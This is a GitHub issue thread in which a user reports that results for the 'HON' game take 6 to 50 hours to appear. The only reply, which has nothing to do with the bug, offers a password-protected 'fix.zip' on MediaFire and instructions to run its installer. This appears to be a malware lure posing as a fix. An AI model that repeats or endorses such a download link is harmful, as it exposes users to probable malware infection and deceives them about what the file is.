### ISSUE TITLE
HON game results are taking longer than expected

### ISSUE THREAD

**Issue by harshitasrivastav28** [go-bazzinga/hot-or-not-backend-canister#381]
Hi team,

Multiple internal users have reported that the result timer is showing 6-7 hrs to display the result of HON game. Infact, for some use cases its going upto 50 hrs. This was not the case earlier and most of the game results were shown within 1 hr time frame.

Can we please re-check the backend logic for the same ?

Attaching the screenshot of the timer.

![Image](https://github.com/user-attachments/assets/31c306bb-47a8-4be5-bc32-1a705ad80dae)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
